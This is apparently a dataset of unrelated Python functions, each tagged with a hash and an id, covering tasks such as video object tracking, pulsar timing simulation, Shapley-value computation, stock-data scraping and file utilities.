AXaxis = M_CrossVecs(WORLDZ,AZaxis)
#print 'deb:\n' #-------------
#print 'deb:getExtrusion() Extrusion=', Extrusion #---------
return Extrusion, AXaxis.normalize()
|
ec6133bddc9093310ffe1e807ae24882aa24edc3
| 20,133 |
def _build_class_include(env, class_name):
"""
If parentns::classname is included and fabric
properties such as puppet_parentns__classname_prop = val1
are set, the class included in puppet will be something like
class { 'parentns::classname':
prop => 'val1',
}
"""
include_def = "class { '%s': \n" % class_name
property_prefix = _property_prefix(class_name)
for name, value in env.iteritems():
if name.startswith(property_prefix):
property_name = name[len(property_prefix):]
if not property_name.startswith("_"): # else subclass property
include_def += " %s => '%s',\n" % (property_name, value)
include_def += "\n}"
return include_def
|
f58633fefb3ca853ef292f554eea4f98126c3ecb
| 20,134 |
async def mention_html(user_id, name):
"""
The function is designed to output a link to a telegram.
"""
return f'<a href="tg://user?id={user_id}">{escape(name)}</a>'
|
eed9dd188f36e4d23bb16e274382372c6464f890
| 20,135 |
from plasma.flex.messaging.messages import small
def blaze_loader(alias):
"""
Loader for BlazeDS framework compatibility classes, specifically
implementing ISmallMessage.
.. seealso:: `BlazeDS (external)
<http://opensource.adobe.com/wiki/display/blazeds/BlazeDS>`_
:since: 0.1
"""
if alias not in ['DSC', 'DSK', 'DSA']:
return
reload(small)
return pyamf.get_class_alias(alias)
|
956acd6aa9c36c186081a43e271b6a3c61b7a53f
| 20,136 |
def get_user_pic(user_id, table):
"""[summary]
Gets users profile picture
Args:
user_id ([int]): [User id]
table ([string]): [Table target]
Returns:
[string]: [Filename]
"""
try:
connection = database_cred()
cursor = connection.cursor()
cursor = connection.cursor(dictionary=True)
if table == "admin":
cursor.execute(
'SELECT admin_pic FROM admin WHERE admin_id=%s', (user_id,))
if table == "user":
cursor.execute(
'SELECT user_pic FROM user WHERE user_id=%s', (user_id,))
records = cursor.fetchall()
except Error as e:
print("parameterized query failed {}".format(e))
finally:
if connection.is_connected():
connection.close()
cursor.close()
return records
|
28ea65c793e88b967889fa39dc8588e4afd75e91
| 20,137 |
def convert_file_format(files,size):
"""
Takes filename queue and returns an example from it
using the TF Reader structure
"""
filename_queue = tf.train.string_input_producer(files,shuffle=True)
image_reader = tf.WholeFileReader()
_,image_file = image_reader.read(filename_queue)
image = tf.image.decode_jpeg(image_file)
image = tf.image.resize_images(image, [size,size])
image.set_shape((size,size,3))
return image
|
0a889dbf8b851716f7a7788cee6cc1f7e7b4c0fc
| 20,138 |
def validate_access_rule(supported_access_types, supported_access_levels,
access_rule, abort=False):
"""Validate an access rule.
:param access_rule: Access rules to be validated.
:param supported_access_types: List of access types that are regarded
valid.
:param supported_access_levels: List of access levels that are
regarded valid.
:param abort: a boolean value that indicates if an exception should
be raised whether the rule is invalid.
:return: Boolean.
"""
errmsg = _("Unsupported access rule of 'type' %(access_type)s, "
"'level' %(access_level)s, 'to' %(access_to)s: "
"%(field)s should be one of %(supported)s.")
access_param = access_rule.to_dict()
def validate(field, supported_tokens, excinfo):
if access_rule['access_%s' % field] in supported_tokens:
return True
access_param['field'] = field
access_param['supported'] = ', '.join(
"'%s'" % x for x in supported_tokens)
if abort:
LOG.error(errmsg, access_param)
raise excinfo['type'](
**{excinfo['about']: excinfo['details'] % access_param})
else:
LOG.warning(errmsg, access_param)
return False
valid = True
valid &= validate(
'type', supported_access_types,
{'type': exception.InvalidShareAccess, 'about': "reason",
'details': _(
"%(access_type)s; only %(supported)s access type is allowed")})
valid &= validate(
'level', supported_access_levels,
{'type': exception.InvalidShareAccessLevel, 'about': "level",
'details': "%(access_level)s"})
return valid
|
2ce7ba446ec583b5b46dbd6a8eceeafe6cc46a6e
| 20,139 |
import tqdm
def track_viou_video(video_path, detections, sigma_l, sigma_h, sigma_iou, t_min, ttl, tracker_type, keep_upper_height_ratio):
""" V-IOU Tracker.
See "Extending IOU Based Multi-Object Tracking by Visual Information by E. Bochinski, T. Senst, T. Sikora" for
more information.
Args:
frames_path (str): path to ALL frames.
string must contain a placeholder like {:07d} to be replaced with the frame numbers.
detections (list): list of detections per frame, usually generated by util.load_mot
sigma_l (float): low detection threshold.
sigma_h (float): high detection threshold.
sigma_iou (float): IOU threshold.
t_min (float): minimum track length in frames.
ttl (float): maximum number of frames to perform visual tracking.
this can fill 'gaps' of up to 2*ttl frames (ttl times forward and backward).
tracker_type (str): name of the visual tracker to use. see VisTracker for more details.
keep_upper_height_ratio (float): float between 0.0 and 1.0 that determines the ratio of height of the object
to track to the total height of the object used for visual tracking.
Returns:
list: list of tracks.
"""
if tracker_type == 'NONE':
assert ttl == 1, "ttl should not be larger than 1 if no visual tracker is selected"
tracks_active = []
tracks_extendable = []
tracks_finished = []
frame_buffer = []
vid = cv2.VideoCapture(video_path)
if not vid.isOpened():
raise IOError("Couldn't open webcam or video")
for frame_num, detections_frame in enumerate(tqdm(detections), start=1):
# load frame and put into buffer
# frame_path = frames_path.format(frame_num)
# frame = cv2.imread(frame_path)
return_value, frame = vid.read()
if return_value != True:
break
if return_value:
# frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# image = Image.fromarray(frame)
# print('image:',image)
pass
else:
raise ValueError("No image!")
assert frame is not None, "could not read '{}'".format(frame_path)
frame_buffer.append(frame)
if len(frame_buffer) > ttl + 1:
frame_buffer.pop(0)
# apply low threshold to detections
dets = [det for det in detections_frame if det['score'] >= sigma_l]
track_ids, det_ids = associate(tracks_active, dets, sigma_iou)
updated_tracks = []
for track_id, det_id in zip(track_ids, det_ids):
tracks_active[track_id]['bboxes'].append(dets[det_id]['bbox'])
tracks_active[track_id]['max_score'] = max(tracks_active[track_id]['max_score'], dets[det_id]['score'])
tracks_active[track_id]['classes'].append(dets[det_id]['class'])
tracks_active[track_id]['det_counter'] += 1
if tracks_active[track_id]['ttl'] != ttl:
# reset visual tracker if active
tracks_active[track_id]['ttl'] = ttl
tracks_active[track_id]['visual_tracker'] = None
updated_tracks.append(tracks_active[track_id])
tracks_not_updated = [tracks_active[idx] for idx in set(range(len(tracks_active))).difference(set(track_ids))]
for track in tracks_not_updated:
if track['ttl'] > 0:
if track['ttl'] == ttl:
# init visual tracker
track['visual_tracker'] = VisTracker(tracker_type, track['bboxes'][-1], frame_buffer[-2],
keep_upper_height_ratio)
# viou forward update
ok, bbox = track['visual_tracker'].update(frame)
if not ok:
# visual update failed, track can still be extended
tracks_extendable.append(track)
continue
track['ttl'] -= 1
track['bboxes'].append(bbox)
updated_tracks.append(track)
else:
tracks_extendable.append(track)
# update the list of extendable tracks. tracks that are too old are moved to the finished_tracks. this should
# not be necessary but may improve the performance for large numbers of tracks (eg. for mot19)
tracks_extendable_updated = []
for track in tracks_extendable:
if track['start_frame'] + len(track['bboxes']) + ttl - track['ttl'] >= frame_num:
tracks_extendable_updated.append(track)
elif track['max_score'] >= sigma_h and track['det_counter'] >= t_min:
tracks_finished.append(track)
tracks_extendable = tracks_extendable_updated
new_dets = [dets[idx] for idx in set(range(len(dets))).difference(set(det_ids))]
dets_for_new = []
for det in new_dets:
finished = False
# go backwards and track visually
boxes = []
vis_tracker = VisTracker(tracker_type, det['bbox'], frame, keep_upper_height_ratio)
for f in reversed(frame_buffer[:-1]):
ok, bbox = vis_tracker.update(f)
if not ok:
# can not go further back as the visual tracker failed
break
boxes.append(bbox)
# sorting is not really necessary but helps to avoid different behaviour for different orderings
# preferring longer tracks for extension seems intuitive, LAP solving might be better
for track in sorted(tracks_extendable, key=lambda x: len(x['bboxes']), reverse=True):
offset = track['start_frame'] + len(track['bboxes']) + len(boxes) - frame_num
# association not optimal (LAP solving might be better)
# association is performed at the same frame, not adjacent ones
if 1 <= offset <= ttl - track['ttl'] and iou(track['bboxes'][-offset], bbox) >= sigma_iou:
if offset > 1:
# remove existing visually tracked boxes behind the matching frame
track['bboxes'] = track['bboxes'][:-offset+1]
track['bboxes'] += list(reversed(boxes))[1:]
track['bboxes'].append(det['bbox'])
track['max_score'] = max(track['max_score'], det['score'])
track['classes'].append(det['class'])
track['ttl'] = ttl
track['visual_tracker'] = None
tracks_extendable.remove(track)
if track in tracks_finished:
del tracks_finished[tracks_finished.index(track)]
updated_tracks.append(track)
finished = True
break
if finished:
break
if not finished:
dets_for_new.append(det)
# create new tracks
new_tracks = [{'bboxes': [det['bbox']], 'max_score': det['score'], 'start_frame': frame_num, 'ttl': ttl,
'classes': [det['class']], 'det_counter': 1, 'visual_tracker': None} for det in dets_for_new]
tracks_active = []
for track in updated_tracks + new_tracks:
if track['ttl'] == 0:
tracks_extendable.append(track)
else:
tracks_active.append(track)
# finish all remaining active and extendable tracks
tracks_finished = tracks_finished + \
[track for track in tracks_active + tracks_extendable
if track['max_score'] >= sigma_h and track['det_counter'] >= t_min]
# remove last visually tracked frames and compute the track classes
for track in tracks_finished:
if ttl != track['ttl']:
track['bboxes'] = track['bboxes'][:-(ttl - track['ttl'])]
track['class'] = max(set(track['classes']), key=track['classes'].count)
del track['visual_tracker']
# debug
# print(data)
f = open('debug.txt', 'w')
f.write(str(tracks_finished))
f.close()
return tracks_finished
|
c2167172943e0fb45311c109aa932adee9dcbe17
| 20,140 |
def deduplicate(inp: SHAPE) -> SHAPE:
"""
Remove duplicates from any iterable while retaining the order of elements.
:param inp: iterable to deduplicate
:return: new, unique iterable of same type as input
"""
return type(inp)(dict.fromkeys(list(inp)))
|
d80ad3e00ce0bfa9a0625308267c5e25d8e3f3c9
| 20,141 |
def access_rules_synchronized(f):
"""Decorator for synchronizing share access rule modification methods."""
def wrapped_func(self, *args, **kwargs):
# The first argument is always a share, which has an ID
key = "share-access-%s" % args[0]['id']
@utils.synchronized(key)
def source_func(self, *args, **kwargs):
return f(self, *args, **kwargs)
return source_func(self, *args, **kwargs)
return wrapped_func
|
03fe6b1905d825de1f20ed2967eb003f96fb2cce
| 20,142 |
def import_python(path, package=None):
"""Get python module or object.
Parameters
----------
path : str
Fully-qualified python path, i.e. `package.module:object`.
package : str or None
Package name to use as an anchor if `path` is relative.
"""
parts = path.split(':')
if len(parts) > 2:
msg = f"Not a correct path ('{path}' has more than one object qualifier)"
raise ValueError(msg)
if len(parts) == 2:
module_path, obj = parts
else:
module_path, obj = path, None
module = import_module(module_path, package=package)
if obj:
return getattr(module, obj)
return module
|
ff2755964c0c24c5366e3243a1b2997176b33a4c
| 20,143 |
from typing import Callable
from typing import Awaitable
async def feature_flags_scope_per_request(
request: Request, call_next: Callable[[Request], Awaitable[Response]]
) -> Response:
"""Use new feature flags copy for each request."""
# Create new copy of the feature flags, as we'll be modifying them later
# and do not want to change our system-wide feature flags.
with ff_ctx as feature_flags:
# FastAPI provides its own dependency injection mechanism, but just
# in case you are using starlette directly or there any other pure
# ASGI middlewares.
request.scope["feature_flags"] = feature_flags
return await call_next(request)
|
9169a2f66f7fa60066695cfef5a320eedd566145
| 20,144 |
import tempfile
import os
def fakepulsar(parfile, obstimes, toaerr, freq=1440.0, observatory="AXIS", flags="", iters=3):
"""Returns a libstempo tempopulsar object corresponding to a noiseless set
of observations for the pulsar specified in 'parfile', with observations
happening at times (MJD) given in the array (or list) 'obstimes', with
measurement errors given by toaerr (us).
A new timfile can then be saved with pulsar.savetim(). Re the other parameters:
- 'toaerr' needs to be either a common error, or a list of errors
of the same length of 'obstimes';
- 'freq' can be either a common observation frequency in MHz, or a list;
it defaults to 1440;
- 'observatory' can be either a common observatory name, or a list;
it defaults to the IPTA MDC 'AXIS';
- 'flags' can be a string (such as '-sys EFF.EBPP.1360') or a list of strings;
it defaults to an empty string;
- 'iters' is the number of iterative removals of computed residuals from TOAs
(which is how the fake pulsar is made...)"""
outfile = tempfile.NamedTemporaryFile(delete=False)
outfile.write(b"FORMAT 1\n")
outfile.write(b"MODE 1\n")
obsname = "fake_" + os.path.basename(parfile)
if obsname[-4:] == ".par":
obsname = obsname[:-4]
for i, t in enumerate(obstimes):
outfile.write(
"{0} {1} {2} {3} {4} {5}\n".format(
obsname, _geti(freq, i), t, _geti(toaerr, i), _geti(observatory, i), _geti(flags, i)
).encode("ascii")
)
timfile = outfile.name
outfile.close()
pulsar = libstempo.tempopulsar(parfile, timfile, dofit=False)
for i in range(iters):
pulsar.stoas[:] -= pulsar.residuals() / 86400.0
pulsar.formbats()
os.remove(timfile)
return pulsar
|
e40ea56e7fa460a651898d6a73b4d3aa661ae174
| 20,145 |
def get_scenes_need_processing(config_file, sensors):
"""
A function which finds all the processing steps for all the scenes which haven't yet been undertaken.
This is per scene processing rather than per step processing in the functions above.
Steps include:
* Download
* ARD Production
* Generating Tile Cache
* Generating Quicklook images
:param config_file: The EODataDown configuration file path.
:param sensors: list of sensor string names to be processed.
:returns: a list of lists where each scn has [config_file, scn_sensor, scn_id]
"""
sys_main_obj = eodatadown.eodatadownsystemmain.EODataDownSystemMain()
sys_main_obj.parse_config(config_file)
tasks = []
for sensor in sensors:
sensor_obj = sys_main_obj.get_sensor_obj(sensor)
scn_ids = []
if sensor_obj.calc_scn_usr_analysis():
scns = sensor_obj.get_scnlist_usr_analysis()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
if sensor_obj.calc_scn_tilecache():
scns = sensor_obj.get_scnlist_quicklook()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
if sensor_obj.calc_scn_quicklook():
scns = sensor_obj.get_scnlist_tilecache()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
scns = sensor_obj.get_scnlist_con2ard()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
scns = sensor_obj.get_scnlist_download()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
return tasks
|
a600cd352980184ebe8382a5cabf9d8b09d9f688
| 20,146 |
def startingStateDistribution(env, N=100000):
"""
This function samples initial states for the environment and computes
an empirical estimator for the starting distribution mu_0
"""
rdInit = []
sample = {}
# Computing the starting state distribution
mu_0 = np.zeros((env.n_states,1))
for i in range(N):
rdInit.append(env.reset())
for i in range(0, env.n_states):
sample[i] = rdInit.count(i)
mu_0[i] = sample[i]/N
return mu_0
|
2685ebe6315a085ffdabbb82786499191c33d957
| 20,147 |
from pathlib import Path
import itertools
import copy
import math
import csv
def get_shapley(csv_filename, modalities = ["t1", "t1ce", "t2", "flair"]):
"""
calculate modality shapeley value
CSV with column: t1, t1c, t2, flair, of 0 / 1. and perforamnce value.
:param csv:
:return:
"""
# convert csv to dict: {(0, 0, 1, 0): 10} {tuple: performance}
df = pd.read_csv(csv_filename)
fold = Path(csv_filename).name.split('.')[0].split('_')[-1]
# print(fold)
df_dict = df.to_dict(orient='records')
# print(df_dict)
v_dict = {} #
for row in df_dict:
mod_lst = []
for m in modalities:
mod_lst.append(row[m])
v_dict[tuple(mod_lst)] = row['accuracy']
# print(v_dict)
n = len(modalities)
# sanity check if all mod combinations are exists
N_sets = list(itertools.product([0,1],repeat = len(modalities))) # set of all_combinations
for s in N_sets:
if tuple(s) not in v_dict:
print("ERROR in get_shapley! {} missing".format(s))
N_sets_array = np.array(N_sets) # array([[0, 0, 0, 0], [0, 0, 0, 1],
mod_shapley = {}
# for each mod, calculate its shapley value:
for i, mod in enumerate(modalities):
# get combination not including mod
n_not_i = N_sets_array[N_sets_array[:, i]==0]# # a list containing all subsets that don't contains i todo
# print(n_not_i, i)
phi_i= 0
for s in n_not_i:
# print('s', s)
v_s = v_dict[tuple(s)]
sANDi = copy.deepcopy(s)
sANDi[i] =1
v_sANDi = v_dict[tuple(sANDi)]
# print(s , s.sum(), i, mod)
phi_i += (v_sANDi - v_s) * math.factorial(s.sum()) * (math.factorial(n - s.sum() - 1)) / math.factorial(n)
mod_shapley[mod] = phi_i
mod_shapley['fold'] = fold
print(mod_shapley)
# save gt shapley to csv
with open(Path(csv_filename).parent/'fold_{}_modality_shapley.csv'.format(fold), 'w') as f:
csv_writer = csv.DictWriter(f, fieldnames=list(mod_shapley.keys()))
csv_writer.writeheader()
csv_writer.writerow(mod_shapley)
# for key in mod_shapley.keys():
# f.write("%s,%s\n" % (key, mod_shapley[key]))
return mod_shapley
|
ba80c0a9a17b7f86b909cbeb9829b6b8cc20f1ca
| 20,148 |
def get_changepoint_values_from_config(
changepoints_dict,
time_features_df,
time_col=cst.TIME_COL):
"""Applies the changepoint method specified in `changepoints_dict` to return the changepoint values
:param changepoints_dict: Optional[Dict[str, any]]
Specifies the changepoint configuration.
"method": str
The method to locate changepoints. Valid options:
"uniform". Places n_changepoints evenly spaced changepoints to allow growth to change.
"custom". Places changepoints at the specified dates.
Additional keys to provide parameters for each particular method are described below.
"continuous_time_col": Optional[str]
Column to apply `growth_func` to, to generate changepoint features
Typically, this should match the growth term in the model
"growth_func": Optional[func]
Growth function (scalar -> scalar). Changepoint features are created
by applying `growth_func` to "continuous_time_col" with offsets.
If None, uses identity function to use `continuous_time_col` directly
as growth term
If changepoints_dict["method"] == "uniform", this other key is required:
"n_changepoints": int
number of changepoints to evenly space across training period
If changepoints_dict["method"] == "custom", this other key is required:
"dates": Iterable[Union[int, float, str, datetime]]
Changepoint dates. Must be parsable by pd.to_datetime.
Changepoints are set at the closest time on or after these dates
in the dataset.
:param time_features_df: pd.Dataframe
training dataset. contains column "continuous_time_col"
:param time_col: str
The column name in `time_features_df` representing time for the time series data
The time column can be anything that can be parsed by pandas DatetimeIndex
Used only in the "custom" method.
:return: np.array
values of df[continuous_time_col] at the changepoints
"""
changepoint_values = None
if changepoints_dict is not None:
valid_changepoint_methods = ["uniform", "custom"]
changepoint_method = changepoints_dict.get("method")
continuous_time_col = changepoints_dict.get("continuous_time_col")
if changepoint_method is None:
raise Exception("changepoint method must be specified")
if changepoint_method not in valid_changepoint_methods:
raise NotImplementedError(
f"changepoint method {changepoint_method} not recognized. "
f"Must be one of {valid_changepoint_methods}")
if changepoint_method == "uniform":
if changepoints_dict["n_changepoints"] > 0:
params = {"continuous_time_col": continuous_time_col} if continuous_time_col is not None else {}
changepoint_values = get_evenly_spaced_changepoints_values(
df=time_features_df,
n_changepoints=changepoints_dict["n_changepoints"],
**params)
elif changepoint_method == "custom":
params = {}
if time_col is not None:
params["time_col"] = time_col
if continuous_time_col is not None:
params["continuous_time_col"] = continuous_time_col
changepoint_values = get_custom_changepoints_values(
df=time_features_df,
changepoint_dates=changepoints_dict["dates"],
**params)
return changepoint_values
|
0c38283e5744f180fbd326a549a4ee37b461c213
| 20,149 |
def jitChol(A, maxTries=10, warning=True):
"""Do a Cholesky decomposition with jitter.
Description:
U, jitter = jitChol(A, maxTries, warning) attempts a Cholesky
decomposition on the given matrix, if matrix isn't positive
definite the function adds 'jitter' and tries again. Thereafter
the amount of jitter is multiplied by 10 each time it is added
again. This is continued for a maximum of 10 times. The amount of
jitter added is returned.
Returns:
U - the Cholesky decomposition for the matrix.
jitter - the amount of jitter that was added to the matrix.
Arguments:
A - the matrix for which the Cholesky decomposition is required.
maxTries - the maximum number of times that jitter is added before
giving up (default 10).
warning - whether to give a warning for adding jitter (default is True)
See also
CHOL, PDINV, LOGDET
Copyright (c) 2005, 2006 Neil D. Lawrence
"""
jitter = 0
i = 0
while(True):
try:
# Try --- need to check A is positive definite
if jitter == 0:
jitter = abs(SP.trace(A))/A.shape[0]*1e-6
LC = linalg.cholesky(A, lower=True)
return LC.T, 0.0
else:
if warning:
# pdb.set_trace()
# plt.figure()
# plt.imshow(A, interpolation="nearest")
# plt.colorbar()
# plt.show()
logging.error("Adding jitter of %f in jitChol()." % jitter)
LC = linalg.cholesky(A+jitter*SP.eye(A.shape[0]), lower=True)
return LC.T, jitter
except linalg.LinAlgError:
# Seems to have been non-positive definite.
if i<maxTries:
jitter = jitter*10
else:
raise linalg.LinAlgError, "Matrix non positive definite, jitter of " + str(jitter) + " added but failed after " + str(i) + " trials."
i += 1
return LC
|
ac2cbc35a3a0c33208456765512893554d91f75c
| 20,150 |
import requests
def stock_individual_info_em(symbol: str = "603777") -> pd.DataFrame:
"""
东方财富-个股-股票信息
http://quote.eastmoney.com/concept/sh603777.html?from=classic
:param symbol: 股票代码
:type symbol: str
:return: 股票信息
:rtype: pandas.DataFrame
"""
code_id_dict = code_id_map_em()
url = "http://push2.eastmoney.com/api/qt/stock/get"
params = {
'ut': 'fa5fd1943c7b386f172d6893dbfba10b',
'fltt': '2',
'invt': '2',
'fields': 'f120,f121,f122,f174,f175,f59,f163,f43,f57,f58,f169,f170,f46,f44,f51,f168,f47,f164,f116,f60,f45,f52,f50,f48,f167,f117,f71,f161,f49,f530,f135,f136,f137,f138,f139,f141,f142,f144,f145,f147,f148,f140,f143,f146,f149,f55,f62,f162,f92,f173,f104,f105,f84,f85,f183,f184,f185,f186,f187,f188,f189,f190,f191,f192,f107,f111,f86,f177,f78,f110,f262,f263,f264,f267,f268,f255,f256,f257,f258,f127,f199,f128,f198,f259,f260,f261,f171,f277,f278,f279,f288,f152,f250,f251,f252,f253,f254,f269,f270,f271,f272,f273,f274,f275,f276,f265,f266,f289,f290,f286,f285,f292,f293,f294,f295',
"secid": f"{code_id_dict[symbol]}.{symbol}",
'_': '1640157544804',
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df.reset_index(inplace=True)
del temp_df['rc']
del temp_df['rt']
del temp_df['svr']
del temp_df['lt']
del temp_df['full']
code_name_map = {
'f57': '股票代码',
'f58': '股票简称',
'f84': '总股本',
'f85': '流通股',
'f127': '行业',
'f116': '总市值',
'f117': '流通市值',
'f189': '上市时间',
}
temp_df['index'] = temp_df['index'].map(code_name_map)
temp_df = temp_df[pd.notna(temp_df['index'])]
if 'dlmkts' in temp_df.columns:
del temp_df['dlmkts']
temp_df.columns = [
'item',
'value',
]
temp_df.reset_index(inplace=True, drop=True)
return temp_df
|
6d04941cb1aeaed49450eff61e957aab26bbf21a
| 20,151 |
def InverseDynamicsTool_safeDownCast(obj):
"""
InverseDynamicsTool_safeDownCast(OpenSimObject obj) -> InverseDynamicsTool
Parameters
----------
obj: OpenSim::Object *
"""
return _tools.InverseDynamicsTool_safeDownCast(obj)
|
3060244716c54e10953df5aa8db1c55076a040a2
| 20,152 |
import os
import re
def in_incident_root(current_dir_path):
"""
Helper function to determine if a sub directory is a child of an incident directory. This is useful for setting
default params in tools that has an incident directory as an input
:param current_dir_path: String of the path being evaluated
:return: tuple of (parent directory path, boolean indicating if the parent directory matches the incident dir pattern)
"""
parent_dir_path, current_dir_name = os.path.split(current_dir_path)
is_root_dir = False
if current_dir_name == 'tools':
parent_dir_name = os.path.basename(parent_dir_path)
if re.match(r'\d{4}_[a-zA-Z]*', parent_dir_name):
is_root_dir = True
return parent_dir_path.lower(), is_root_dir
|
62b8f9d9bddcc8ecfa232a65f205bd8414320928
| 20,153 |
def build_decoder(encoding_dim,sparse):
""""build and return the decoder linked with the encoder"""
input_img = Input(shape=(28*28,))
encoder = build_encoder(encoding_dim,sparse)
input_encoded = encoder(input_img)
decoded = Dense(64, activation='relu')(input_encoded)
decoded = Dense(128, activation='relu')(decoded)
decoded = Dense(28*28,activation='relu')(decoded)
decoder = Model(input_img,decoded)
return decoder
|
207535e38fd45e7ea6e0143c34607213747328ba
| 20,154 |
def find_usable_exits(room, stuff):
"""
Given a room, and the player's stuff, find a list of exits that they can use right now.
That means the exits must not be hidden, and if they require a key, the player has it.
RETURNS
- a list of exits that are visible (not hidden) and don't require a key!
"""
usable = []
missing_key = []
for exit in room['exits']:
if exit.get("hidden", False):
continue
if "required_key" in exit:
if exit["required_key"] in stuff:
usable.append(exit)
continue
else:
missing_key.append(exit)
usable.append(exit)
continue
continue
usable.append(exit)
return usable, missing_key
|
529bacbf33b5680774b291782fdcefe650cafeca
| 20,155 |
def get_normal_map(x, area_weighted=False):
"""
x: [bs, h, w, 3] (x,y,z) -> (nx,ny,nz)
"""
nn = 6
p11 = x
p = tf.pad(x, tf.constant([[0,0], [1,1], [1,1], [0,0]]))
p11 = p[:, 1:-1, 1:-1, :]
p10 = p[:, 1:-1, 0:-2, :]
p01 = p[:, 0:-2, 1:-1, :]
p02 = p[:, 0:-2, 2:, :]
p12 = p[:, 1:-1, 2:, :]
p20 = p[:, 2:, 0:-2, :]
p21 = p[:, 2:, 1:-1, :]
pos = [p10, p01, p02, p12, p21, p20]
for i in range(nn):
pos[i] = tf.subtract(pos[i], p11)
normals = []
for i in range(1, nn):
normals.append(tf.cross(pos[i%nn], pos[(i-1+nn)%nn]))
normal = tf.reduce_sum(tf.stack(normals), axis=0)
if not area_weighted:
normal = tf.nn.l2_normalize(normal, 3)
normal = tf.where(tf.is_nan(normal),
tf.zeros_like(normal), normal)
return normal
|
1b087113d6bc68a24195459ece006c7a74848a63
| 20,156 |
def _ros_group_rank(df, dl_idx, censorship):
"""
Ranks each observation within the data groups.
In this case, the groups are defined by the record's detection
limit index and censorship status.
Parameters
----------
df : pandas.DataFrame
dl_idx : str
Name of the column in the dataframe the index of the
observations' corresponding detection limit in the `cohn`
dataframe.
censorship : str
Name of the column in the dataframe that indicates that a
observation is left-censored. (i.e., True -> censored,
False -> uncensored)
Returns
-------
ranks : numpy.array
Array of ranks for the dataset.
"""
# (editted for pandas 0.14 compatibility; see commit 63f162e
# when `pipe` and `assign` are available)
ranks = df.copy()
ranks.loc[:, 'rank'] = 1
ranks = (
ranks.groupby(by=[dl_idx, censorship])['rank']
.transform(lambda g: g.cumsum())
)
return ranks
|
f4495eb57d158745603899086e59643edec1e489
| 20,157 |
def f_all(predicate, iterable):
"""Return whether predicate(i) is True for all i in iterable
>>> is_odd = lambda num: (num % 2 == 1)
>>> f_all(is_odd, [])
True
>>> f_all(is_odd, [1, 3, 5, 7, 9])
True
>>> f_all(is_odd, [2, 1, 3, 5, 7, 9])
False
"""
return all(predicate(i) for i in iterable)
|
c0a0e52587a7afc9da143ac936aab87ad531b455
| 20,158 |
from typing import List
from typing import Tuple
from typing import Set
from typing import Dict
def _recursive_replace(data):
"""Searches data structure and replaces 'nan' and 'inf' with respective float values"""
if isinstance(data, str):
if data == "nan":
return float("nan")
if data == "inf":
return float("inf")
if isinstance(data, List):
return [_recursive_replace(v) for v in data]
if isinstance(data, Tuple):
return tuple([_recursive_replace(v) for v in data])
if isinstance(data, Set):
return set([_recursive_replace(v) for v in data])
if isinstance(data, Dict):
return {k: _recursive_replace(v) for k, v in data.items()}
return data
|
b5c21d806b462070b2d1eec7d91a5dc700f6b0ed
| 20,159 |
def trans_text_ch_to_vector(txt_file, word_num_map, txt_label=None):
""" Trans chinese chars to vector
:param txt_file:
:param word_num_map:
:param txt_label:
:return:
"""
words_size = len(word_num_map)
to_num = lambda word: word_num_map.get(word.encode('utf-8'), words_size)
if txt_file != None:
txt_label = get_ch_lable(txt_file)
labels_vector = list(map(to_num, txt_label))
return labels_vector
|
83370ca18303e1286b099d646362db14cd4b5dbd
| 20,160 |
def adjust_bag(request, item_id):
""" Adjust the quantity of a product to the specified amount"""
quantity = int('0'+request.POST.get('quantity'))
bag = request.session.get('bag', {})
if quantity > 0:
bag[item_id] = quantity
else:
messages.error(request, 'Value must greather than or equal to 1.\
If you do not need this product, click on the Remove button.')
request.session['bag'] = bag
return redirect(reverse('view_bag'))
|
a2814adcffbc04ee02b18bd14fc7daf0dbe58677
| 20,161 |
import os
def get_file_paths_in_dir(idp,
ext=None,
target_str_or_list=None,
ignore_str_or_list=None,
base_name_only=False,
without_ext=False,
sort_result=True,
natural_sorting=False,
recursive=False):
""" ext can be a list of extensions or a single extension
(e.g. ['.jpg', '.png'] or '.jpg')
"""
if recursive:
ifp_s = []
for root, dirs, files in os.walk(idp):
ifp_s += [os.path.join(root, ele) for ele in files]
else:
ifp_s = [os.path.join(idp, ele) for ele in os.listdir(idp)
if os.path.isfile(os.path.join(idp, ele))]
if ext is not None:
if isinstance(ext, list):
ext = [ele.lower() for ele in ext]
check_ext(ext)
ifp_s = [ifp for ifp in ifp_s if os.path.splitext(ifp)[1].lower() in ext]
else:
ext = ext.lower()
check_ext(ext)
ifp_s = [ifp for ifp in ifp_s if os.path.splitext(ifp)[1].lower() == ext]
if target_str_or_list is not None:
if type(target_str_or_list) == str:
target_str_or_list = [target_str_or_list]
for target_str in target_str_or_list:
ifp_s = [ifp for ifp in ifp_s if target_str in os.path.basename(ifp)]
if ignore_str_or_list is not None:
if type(ignore_str_or_list) == str:
ignore_str_or_list = [ignore_str_or_list]
for ignore_str in ignore_str_or_list:
ifp_s = [ifp for ifp in ifp_s if ignore_str not in os.path.basename(ifp)]
if base_name_only:
ifp_s = [os.path.basename(ifp) for ifp in ifp_s]
if without_ext:
ifp_s = [os.path.splitext(ifp)[0] for ifp in ifp_s]
if sort_result:
if natural_sorting:
ifp_s = sorted(ifp_s, key=natural_key)
else:
ifp_s = sorted(ifp_s)
return ifp_s
|
f450f8b5f04c2fb22975e4a46725ae566346a94b
| 20,162 |
def _condexpr_value(e):
"""Evaluate the value of the input expression.
"""
assert type(e) == tuple
assert len(e) in [2, 3]
if len(e) == 3:
if e[0] in ARITH_SET:
return _expr_value(e)
left = _condexpr_value(e[1])
right = _condexpr_value(e[2])
if type(left) != type(right):
# Boolean result expected
return False
elif e[0] == 'and':
return left and right
elif e[0] == 'or':
return left or right
elif e[0] == '=':
return left == right
elif e[0] == '!=':
return left != right
elif e[0] == '>':
return left > right
elif e[0] == '>=':
return left >= right
elif e[0] == '<':
return left < right
elif e[0] == '<=':
return left <= right
elif e[0] == 'not':
return not _condexpr_value(e[1])
elif e[0] in ['string', 'number', 'boolean']:
return e[1]
elif e[0] == 'identifier':
return get_config(e[1])['value']
raise Exception("Unexpected depend list: " + str(e))
|
3973a22b5c5553c2c1b70b94f97be4d54f224766
